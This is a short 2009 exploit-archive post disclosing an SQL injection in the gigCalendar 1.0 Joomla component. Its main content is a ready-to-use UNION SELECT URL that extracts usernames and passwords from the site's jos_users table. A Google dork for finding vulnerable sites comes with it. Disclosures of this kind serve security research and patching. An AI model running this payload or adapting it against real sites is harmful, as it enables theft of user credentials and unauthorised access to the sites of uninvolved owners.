
Date: Sat, 21 Feb 2009 19:00:59 +0100
From: "Salvatore \"drosophila\" Fresta" <drosophilaxxx@...il.com>
To: Bugtraq <bugtraq@...urityfocus.com>, submit@...w0rm.com
Subject: gigCalendar Joomla Component 1.0 SQL Injection

*******   Salvatore "drosophila" Fresta   *******


Application:	gigCalendar Joomla Component 1.0
			http://joomlacode.org/gf/project/gigcalendar/
Version:		gigCalendar 1.0
Bug:         	* SQL Injection
Exploitation:	Remote
Dork:		inurl:"index.php?option=com_gigcal"
Date:         	21 Feb 2009
Discovered by:Salvatore "drosophila" Fresta
Author:       	Salvatore "drosophila" Fresta
		        e-mail: drosophilaxxx@...il.com
              	

*************************************************

- BUGS

SQL Injection:

	Requisites: magic_quotes_gpc = off

	File affected: banddetails.php

	This bug allows a guest to view username and
	password of a registered user.

	http://www.site.com/path/index.php?option=com_gigcal&task=details&gigcal_bands_id=-1'
UNION ALL SELECT 1,2,3,4,5,concat('username: ',
username),concat('password: ', password),NULL,NULL,NULL,NULL,NULL,NULL
from jos_users%23

*************************************************

-- 
Salvatore "drosophila" Fresta
CWNP444351
